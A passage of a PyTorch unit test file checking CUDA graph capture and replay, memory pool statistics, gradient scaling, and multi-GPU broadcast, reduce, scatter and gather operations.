("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNC states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
